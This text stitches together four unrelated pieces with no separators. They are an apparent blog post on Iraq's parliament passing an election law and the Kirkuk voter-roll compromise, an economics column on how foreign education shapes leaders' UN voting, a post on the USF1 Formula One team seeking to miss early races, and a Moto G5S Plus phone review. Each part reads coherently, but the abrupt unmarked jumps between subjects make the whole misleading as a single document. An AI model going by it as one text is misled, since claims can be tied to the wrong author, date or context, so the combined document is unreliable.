Al-Zaman reports in Arabic that the Iraqi parliament approved the electoral law to govern the elections scheduled for early next year . The vote was 141 in favor out of what Al-Zaman said were 175 attending ( the Iraqi parliament has 275 seats , so a simple majority is 138 ) . AFP estimated attending MPs at 195 .
President Barack Obama hailed the vote as “ an important milestone as the Iraqi people continue to take responsibility for their future. ” In other words , it means to the Obama administration that the time when they can get out of Iraq is nearer . US ambassador Christopher Hill is said to have played a key mediating role in pushing the law through after it was voted on and failed to pass numerous times .
Update : Steve Clemons reports that Vice President Joe Biden played a cental role in the negotiations . Clemons stresses his calls with Kurdistan president Massoud Barzani . But since the legislation was a big win for the Kurds , the hard talk must have been with Arab leaders such as PM Nuri al-Maliki , who gave up a lot on Kirkuk .
The Kurdistan Alliance scored a major victory insofar as the law agrees to use the 2009 voting rolls for the polls in Kirkuk Province . The Kurdistan Regional Government began as a provincial confederacy incorporating 3 of Iraq 's 18 provinces , but over time the original provincial administrations and borders were erased , leaving the KRG as a super-province in its own right . Kurdistan wishes to incorporate into itself a fourth province , oil-rich Kirkuk , which has a mixed population of Kurds , Turkmen and Arabs . Turkmen and Arabs on the whole do not wish to become part of Kurdistan . There has been enormous Kurdish immigration into Kirkuk in recent years . Kurds say these immigrants had been in Kirkuk but were expelled by Saddam , who brought up Arabs to Arabize the province .
But there were lots of Arabs in Kirkuk before Arabization , and probably a significant proportion of new Kurdish immigrants were not traditionally residents there . Arabs and Turkmen also charge that the current voting rolls are full of fraudulent names , as Kurds have attempted to pack the registration list . The Arab and Turkmen members of parliament had wanted the 2004 electoral rolls used , to offset the likelihood of a Kurdish landslide in Kirkuk province that might set the stage for its full incorporation into the Kurdistan Regional Government . The compromise is that the Kirkuk electoral rolls will be subject to special scrutiny . If at least 5 % of voter registration in a district is found fraudulent , then any 55 parliamentarians may call for a recount .
Al-Zaman says that during the moments when the vote was taken and the results announced , the chamber was in chaos . Some members of parliament doubted that the measure actually received 141 votes . The Kurdistan Alliance MPs went wild with joy at the passage of the law in this form .
Some members of parliament objected to a provision whereby displaced Iraqi outside their own original places of residence are not allowed to vote . Given the ethnic cleansing of so many Sunni Arabs of Baghdad and environs this provision probably hurts the Sunni Arab parties . Critics of the measure said it was unconstitutional , since the Iraqi constitution does not tie voting rights for citizens to place of residence .
The election had been scheduled for January 16 , but it is now set for January 23 . Ambassador Hill is reportedly pushing hard for that date as final .
Nevertheless , al-Zaman reports that the Iraqi High Commission says that this law was enacted too late to hold the election on time . He is requesting a 3-month delay , to April 16 . This delay would affect Americans , since the US military is being kept in Iraq at this point primarily so that it can lock down the country for 3 days to allow voters to go to the polls without being blown up . Delaying the date of the election might delay the timeline for taking troops out of the country . This delay is no doubt what spurred Ambassador Hill to insist that January 23 is the firm date . Constitutionally , moreover , the election must take place in January .
The law calls for a system wherein voters vote for candidates by name , though these are part of an electoral list or party . This system should not be confused with the US and British open voting , wherein one can vote for candidates regardless of their party or even vote for independents . In Iraq , the party lists still put up the candidates . Iraqis contrast this “ Modified List ” system to the closed list system that had been used for previous elections , where voters only have the option of choosing an electoral list or party when they vote , but had no control over which candidates the victorious party would seat in parliament .
Grand Ayatollah Ali Sistani , the spiritual leader of Iraqi Shiites , had campaigned hard for a modified list system , appearing to believe that the closed list encourages sectarianism , and that it is undemocratic insofar as it detracted from popular sovereignty ( the people should have a say in particular politicians elected and not just which party gets to choose them ) .
Al-Sharq al-Awsat reports that the number of seats in parliament will be expanded from 275 to 310 by this law .
The passage of the electoral law now allows Iraq to proceed on something like the timeline envisaged for it in the Status of Forces Agreement . If the election is held on January 23 , there will probably be months of wrangling over who will be the new prime minister . But that indecision should not be a bar to withdrawing US troops , who are continuing to come out of Iraq ahead of schedule .
End/ ( Not Continued )
The Alma Mater effect : The influence of a foreign education on political leaders ' foreign policy
Axel Dreher , Shu Yu
The belief that educating future leaders of other countries helps spread the values of the country of study has inspired many foreign-education programmes . This column uses data on the education and UN voting patterns of 831 world leaders to show that foreign-educated leaders tend to be less friendly with former hosts , but more friendly with countries that share the host 's culture and politics . This appears to reflect a tension between ‘ affinity ' with former hosts and ‘ allegiance ' to domestic voters .
Governments and citizens generally assume that opening education to foreign students creates important benefits for the host country . Research backs this assumption : a substantial proportion of foreign students permanently stay in the country in which they study , creating an inflow of high-skilled labour ( Dreher and Poutvaara 2011 ) .
There may also be a mutual benefit from a transfer of values from host to country of origin . Students who return from democratic countries spread the democratic values they acquired while studying ( Spilimbergo 2009 ) . Docquier et al . ( 2011 ) find a positive effect of emigration on the quality of political institutions in the emigrants ' country of origin in a large sample of developing countries .
This belief that foreign education can spread the host country 's values and policy preferences through the education of future political and economic leaders has inspired foreign-education programmes like the Fulbright Program , the International Lenin School , Yale 's World Fellows Program , Harvard 's Ash Center for Democratic Governance , and Oxford 's Blavatnik School of Government . All these programmes target the next generation of global leaders , partly to improve diplomatic relations between the home and host countries . The US Department of Education ( 2012 ) explicitly pursues “ active education diplomacy ” to “ [ a ] dvance US international priorities in strategically important countries ” . Colonial powers such as the UK and France used to select promising young elites to study in their institutes to cultivate them to be future governors . Examples include Cameroon 's Paul Biya , the Republic of Congo 's Marien Ngouabi , and Ghana 's Hilla Limann .
Not every foreign-educated leader later supports its host 's diplomatic ambitions , of course . Consider China 's leader over the 1978-1992 period , Deng Xiaoping . Deng was selected by the Chinese Communist Party to study at Moscow Sun Yat-sen University , where he spent more than a year . Subsequently , Deng did little to improve China 's relationship with the Soviet Union ( Marti 2002 ) .
In a recent paper , we argue that two opposing forces shape the foreign policy of leaders who once studied in another country , which we call ‘ affinity ' and ‘ allegiance ' ( Dreher and Yu 2016 ) . Affinity is pre-existing or developed while studying abroad , and makes foreign-educated leaders more likely to support their ( former ) host country . But foreign-educated leaders also need to demonstrate allegiance to the population of the country they govern . This shows that their policies are designed to favour their own country , rather than the country in which they once studied . The net effect of foreign education on diplomatic relations between the leaders ' home and host is thus ambiguous .
Ideas , values , and interests will crucially influence students ' decisions of where to study . We can assume that leaders who choose to study in a country share that country 's values , and so would be more likely to hold a similar stance on foreign policy compared to leaders who had studied elsewhere . Therefore , it is intuitive that leaders who have studied in a foreign country are more likely to have some affinity to their host , compared to other leaders .
For any given value system , a student holds upon arrival in a host country , we expect the prolonged presence in a country to shape the student 's character , ideas , and interests – and thus future foreign policy . Spilimbergo ( 2009 ) as well as Gift and Krcmaric ( 2015 ) argue that Western education instils a sense of common identity with the international democratic community . Spilimbergo writes : “ [ F ] oreign educated leaders seem to be extremely motivated to keep up with the more developed countries where they studied . ”
Allegiance is subtler . Consider Taiwan 's Ma Yingjeo . During Taiwan 's 2008 presidential election , voters questioned Ma 's allegiance to Taiwan , given his possession of a US permanent residence ( green ) card . Another example is Malawi 's 2014 presidential election , in which there was a public debate on whether someone holding a green card should be allowed to participate in the election . The Huffington Post ( 2015 ) wrote of US Senator John Kerry :
“ When he was running as the Democratic presidential challenger ... aides to then Massachusetts Senator John Kerry were concerned that their candidate , who attended a Swiss boarding school as a child , learned to speak fluent French , and who spent summers at his family 's estate in the coastal region of Brittany would be seen by American voters as the so-called European Candidate , or , ( God forbid ! ) as a bit too French . ”
Just as the authorities that set up foreign education programs expect former students to be more favourable towards their foreign policy , the leaders ' domestic populations might worry they are too sympathetic to the foreign power . Therefore we argue that leaders with foreign education need to demonstrate allegiance to their own country more than leaders who have not studied abroad , so as to consolidate their popularity and stay in office .
In our paper , we gather data on the educational background of 831 leaders , and investigate voting patterns in the United Nations General Assembly ( UNGA ) between 1975 and 2011 as a proxy for foreign policy . Figure 1 shows that the US is the most common destination of foreign education , as 15 % of the leaders in our sample studied there . The UK is the next most common , then France . G7-educated leaders are densely concentrated in Africa and former colonies . This is partially due to colonial ties and the comparatively poorer education systems in those countries .
Figure 1 The percentage of leaders in sample receiving some education in a G7 country
Our results show that , on average , foreign-educated leaders are less friendly with their host countries , but more friendly with countries that broadly share the host country 's cultural and political goals compared to leaders without foreign education . We interpret this as evidence for the relative roles of affinity and allegiance .
Studying abroad has shaped the leader ' values and beliefs , and so shifts their foreign policy .
At the same time , leaders need to show some distance from the country in which they studied to demonstrate allegiance . This behaviour is particularly pronounced at election time , when the signal is arguably most important for the leaders to survive in power .
Our results have important implications for educational policy and international relations . While educating future leaders indeed fosters a certain degree of affinity , this will be less apparent at when leaders face domestic elections . Countries that share culture and foreign policy goals with the host country , but in which a leader has not studied , can profit from affinity but are not tainted by allegiance . They are more likely to benefit from that leader 's foreign education .
We suspect that to alleviate the negative effect of allegiance on diplomatic relations between a leader 's home and host , a larger share of the home country population would need to build affinity , rather than just the leader . Education policies that aim at improving relations between countries would need to focus on populations , rather than leaders .
References
Docquier , F. , E. Lodigiani , H. Rapoport and M. Schiff ( 2011 ) , Emigration and democracy , Centro Studi Luca d'Agliano Development Studies Working Paper 307 .
Dreher , A. and P. Poutvaara ( 2011 ) , Foreign Students and Migration to the United States , World Development 38 , 1294-1307 .
Dreher , A. and Shu Yu ( 2016 ) , The Alma Mater Effect – Does Foreign Education of Political Leaders Influence Foreign Policy ? CEPR Discussion Paper No . 11450 .
Gift , T. and D. Krcmaric ( 2015 ) , Who Democratizes ? Western-educated Leaders and Regime Transitions , Journal of Conflict Resolution , forthcoming .
Marti , M. ( 2002 ) , China and the legacy of Deng Xiaoping : From communist revolution to capitalist evolution . Potomac Books .
Spilimbergo , A . ( 2009 ) , Democracy and Foreign Education , American Economic Review 99 , 528-543 .
U.S. Department of Education ( 2012 ) , International Strategy 2012–16 , Succeeding Globally Through International Education and Engagement .
It has been widely reported today that the USF1 team has asked the FIA for permission to miss the first four races of the season , starting at the beginning of the European season .
Team founder Ken Anderson spoke to the New York Times on Friday and admitted that the team was not currently good to go , but suggested that some funding would be available provided that the FIA gives them this massive concession soon ,
`` If we get a decision quickly , it triggers funding and we 're good to go , '' he said .
`` We 're working with the FIA to clarify how many races we can miss , '' he added . `` In an ideal world , we can miss the first four races and show up in Barcelona [ 9 May ] . ''
There have been mixed signals on the possibility of teams missing races . Although it has been suggested by Bernie Ecclestone that in the Concorde Agreement a team can miss three races , FIA president Jean Todt said recently that this was not the case .
USF1 was caught out by the late resolution of the row between the teams and the FIA last summer . It delayed its plans by several months . There have been rumours that the team 's main backer , YouTube founder Chad Hurley , was on the pointg of pulling out but Anderson denied this .
He wants a lifeline , some sponsors have not followed through on pledges to back the team , apparently and he feels the FIA should help his team , not strangle it at birth .
`` Why would they give us a franchise and just , the first time there 's a bump in the road , yank it and put it out of business ? '' he said . `` That 's definitely not the message I 'm getting from them . They want to help us , not shut us down . ''
Meanwhile we have Stefan GP , which has already had its run ins with the FIA over the new team selection process , waiting in the wings to take USF1 's place .
It 's a tricky one for the FIA . To give them the leeway would create an unfortunate precedent and this is a dog eat dog business , so why should USF1 be cut some slack ? But if the FIA kick them out would be construed as an admission that they were not diligent enough in checking the viability of the team . The selection process for new teams was widely criticised by media and teams at the time , but it yielded the three teams it yielded . Then when BMW failed to sign the Concorde Agreement an entry was offered to Lotus , making it four new teams . Sauber then bought BMW Sauber and got an entry .
It comes down to viability . Does USF1 have the legs to still be in F1 in ten years if it is given a second chance now ? Does the FIA believe that Stefan is viable and will be able to move beyond the 'second hand Toyota ' phase and develop into a proper team ?
If the FIA believes that Stefan has the wherewithal to make a go of it , perhaps it should give them the entry . Either way , the last thing F1 needs is a team which peters out during the season .
What do you think ?
What exactly quantifies a budget smartphone ? Is it a price point resting below a certain level ? A lack of any flagship-level features ? Or an outdated design compared to today 's standards ?
The answer is different for almost everyone , but one thing is for certain : Lenovorola knows how to refine a design , generation after generation . This is the Moto G5S Plus review .
Design
The Moto G5S Plus is definitely a step up from the Moto G5 Plus , which had a similar layout but felt like it was much more pieced-together than a solid chunk of metal whittled down into the shape of a handset .
The Moto G5S Plus really fits the profile for a solid modern-day smartphone
With a rounded all-metal design reminiscent of something like the OnePlus 5 , the Moto G5S Plus really fits the profile for a solid modern-day smartphone . While the screen might be a bit large for some users at 5.5 inches , it feels like it adds to the media experience more than it detracts from usability .
The Moto badge on the back of the phone becomes an indent yet again , which makes me nostalgic for the first generation Moto X . This aids in the overall feel of the device in your hand , since your index finger naturally lands in the general area of the dimple .
Above the dimple you 'll find the Moto camera bump that 's been present for the last couple of generations . This time , the company has actually managed to pack in two sensors , which brings the device up to date with many of today 's flagships .
I found the power and volume rockers to be exceptionally clicky and pronounced , sticking out a fair bit more than other options on the market . They jut out about twice as far as the Moto G5 Plus ' buttons , so it 's clear that the company took in user feedback and acted on it in the next revision . These buttons are also made of the same metallic alloy as the phone itself , so they feel very premium .
On the bottom edge you 'll find some a mono downward-firing speaker and a micro-USB port . The headphone jack – yes , it has one – sits on the top edge of the device . I personally like this placement , since I listen to a lot of podcasts while my phone is in my pocket .
The Moto G5S Plus is extremely fast to wake when you tap your finger to the reader
There is a fingerprint reader on the front of the phone and it is extremely fast . I do n't know if my Pixel XL has just become slower over the last year , but the Moto G5S Plus feels even faster to wake when you tap your finger to the reader . It 's also really sensitive . This became problematic a few times though , as the phone would sometimes wake while it was sitting in my pocket .
The only caveat I 've had with the design of this device is that the metal rim seems to scratch and chip fairly easily . Over the week or so that I 've had it I 've noticed a number of scars appear on the trim , especially where the screen meets the exterior . While this is n't a huge deal , it makes an otherwise premium-feeling device seem just a little less exceptional .
While the overall design of this device is n't incredibly original , it 's still very good . I hope Moto continues to refine upon it for Moto G generations to come .
Display
Despite its design , this is still a budget device . Because of that , Motorola included a Full HD 1080p display in this phone . Is that bad ?
Not in the slightest .
I 've said this before , but using 1080p displays in smartphones barely makes any difference at all in overall usability , and this is no exception . The 5.5-inch LCD panel does just fine in almost every circumstance , and 401 ppi is perfectly fine for most people .
The Moto G5S Plus ' display felt quite bright even at all-but minimal brightness , so I was still able to keep the device on the ultra-low end of the brightness scale while using it outdoors . Colors pop very nicely , and I never felt that I wanted something more punchy .
Sure , this phone does n't have the new bezel-less style like many flagships on the market today , but it feels like it uses up the space of the bezels quite well . There is a “ moto ” logo at the top that could probably be removed to make room for a bigger screen , but this has become an essential part of Lenovo 's branding , so I can understand why they kept it .
Performance & hardware
Surprisingly , Moto does n't really skimp that much when it comes to hardware and raw specifications , despite the Moto G5S Plus ' low starting price . The phone 's Qualcomm Snapdragon 625 does a more than a decent job for a majority of the things you 'll be using your phone for .
There are two versions sporting different amounts of RAM and internal storage . One packs 3 GB of RAM and 32 GB of internal storage for $ 229 , while the heftier 4 GB / 64 GB model will cost an additional $ 70 . I had the latter for this review . I 've been very happy with the performance this option has been giving me , but I 'm sure the baseline model would do just fine as well . Both models also have a micro-SD slot , so you can easily take all your music and other media with you when you upgrade .
The G5S Plus is packing a 3,000 mAh battery , which is about average for a device of this size , but pairs very , very well with the FHD display .
The handset lasted two entire days on one charge , which left me with a smile on my face at the end of it all
The handset lasted two entire days on one charge , which left me smiling . I unplugged it Sunday morning before heading out of the house , and the device died just as I arrived home Monday evening . I was able to snap a screenshot immediately before this though , and I came away with four hours and forty-three minutes of screen-on time . Pretty admirable .
The G5S Plus charges using the Micro-USB port at the bottom of the phone . It supports Moto 's TurboPower charging capabilities , so assuming you have the correct brick , you should be able to juice the phone up quite rapidly . While I would have loved to see a USB Type-C port here , this is just one of the compromises Moto had to make to keep the device at this price point .
The bottom-firing speakers get quite loud , though they lack bass . Moto 's default ringtones and alert sounds are also quite shrill and annoying , so you 'll want to keep this thing on vibrate or change the system sounds to something easier on the ears .
I was very disappointed to find that Motorola has not included an NFC chip in this phone . I use Android Pay every single day , and I was really confused when I went to pay for my groceries and nothing happened when I tapped the reader . This is a huge detriment for me , and we 've seen how people react when small features like this are overlooked .
Overall the device has solid components . For $ 229- $ 300 it 's going to be tough to find such compelling features in 2017 .
Camera ( s )
The Moto G5S Plus features a pair of dual-cameras , both with 13 MP sensors , and an 8 MP front-facing selfie camera . But as we 've seen previously , sheer numbers do n't tell more than half the story of a camera 's actual quality and functionality .
The secondary camera on the G5S Plus only handles depth effects and it does it pretty badly . Images look very soft and lack detail when using this mode ; so much so it 's not really worth using at all . There 's a slider to control the intensity of the depth effect , but honestly they 're all pretty bad . It worked best when used on a human subject , which I admit it was probably tuned for , but not all shots are portraits .
There 's a slider to control the intensity of the depth effect , but honestly they 're all pretty bad .
The live view shown when using the depth mode also makes the phone lag quite a lot . This is frustrating , because the dual cameras were obviously a standout marketing point . Even pressing the shutter button makes the phone freeze for a couple of seconds . Viewing the images later will initially show what the regular shot would have looked like for a few seconds before loading the depth of field effect .
The front-facing selfie camera does an alright job , though it definitely crushes blacks more than I would like . Just wearing a maroon colored shirt in normal indoor lighting had the camera showing it as barely colored at all , which is a big letdown for me . Highlights also get blown out very easily , and it makes it very hard to get an evenly lit shot .
The camera works , but you 're going to have to expand your budget quite a bit if you want a phone that you can also use as your primary shooter .
Software
Navigating Motorola 's lightly skinned version of Android is a breeze on this device . It 's running Android 7.1 Nougat , and the company has even promised that owners will see Android Oreo in the coming months .
Motorola did n't load this device with any bloatware ( unless you consider Google apps bloatware 🤷‍♂️ ) except for an app simply called Moto . While I find most manufacturer gimmicks annoying and cumbersome , Motorola is the one company whose added functionality I always appreciate .
There are two subsections of the Moto app : Moto Actions and Moto Display . These offer a wide variety of gestures and actions that will make your Android experience a lot simpler to use . You 're also able to toggle features on and off as you please .
Moto Actions
One button nav : Uses the fingerprint sensor as a home , sleep , back , and multitasking button , depending on the gesture .
Chop twice for flashlight : Allows you to toggle the flashlight on and off by making a “ double chop ” motion with the device .
Twist for quick capture : Allows you to quickly launch the camera by twisting your wrist in a rapid motion .
Swipe to shrink screen : Makes the screen smaller for easier one-handed use .
Pick up to stop ringing : Switches to vibrate when you lift the phone while it 's ringing .
Flip for Do Not Disturb : Allows you to silence all notifications and calls by placing the phone on its face .
Moto Display
Night Display : Reduces blue light during a set period to help you sleep better after using your device just before bed .
Moto Display : Displays actionable notifications for you to quickly launch and interact with while the phone is locked .
Nearly all of these features were immensely helpful , and some ( like Moto Display ) have even become baked into Android over the years .
There are n't any other bloatware apps present on this device . FM Radio makes an appearance , but that is more of a bonus than a detriment , especially when most flagship devices on the market today have removed this functionality .
Specs
Moto G5S Plus Display 5.5-inch IPS LCD
1920 x 1080 resolution
401ppi Gorilla Glass 3 Processor 2.0 GHz octa-core Qualcomm Snapdragon 625 GPU Adreno 506 RAM 3/4 GB Storage 32/64 GB
microSD expansion up to 256 GB Cameras Rear : Dual 13 MP sensors with an f/2 aperture
Front : 8 MP sensor with an f/2 aperture Battery 3,000 mAh
Non-removable Connectivity Wi-Fi 802.11n dual-band
Bluetooth 4.2
MicroUSB
3.5mm headphone jack
GPS+GLONASS
NFC ( not in the US ) Software Android 7.1 Nougat
( Planned 8.0 update ) Dimensions and weight 153.5 x 76.2 x 8.0 mm
168 grams
Gallery
Pricing & final thoughts
The Moto G5S Plus is an incredibly compelling piece of hardware . We crowned its younger sibling the Moto G5 Plus the king of budget back in April of this year , and this newer ‘ S ' variant improves upon this model in every way .
For $ 229 you 're getting a modern day exterior , a lightning fast fingerprint reader , simplistic and compelling software with a guaranteed update to Google 's latest version , and even dual cameras ( though we 've seen much better ) . Qualcomm 's Snapdragon 625 performs admirably accompanied by the 3/4 GB RAM options , and storage should n't be an issue due to the option for micro-SD expansion .
Coming in at just $ 10 more expensive than the G5 Plus , there really is n't any reason not to pick up the G5S Plus . It looks and feels better in every way , and though the specs are very similar , you 're still getting more RAM and dual cameras with an improved body in the latter . What 's not to love ?
The Moto G5S Plus might not be the most premium device in the world , but it is a pretty damn good phone . For the price , it 's hard to ask for much more .
Next : the Best cheap phones ( September 2017 )
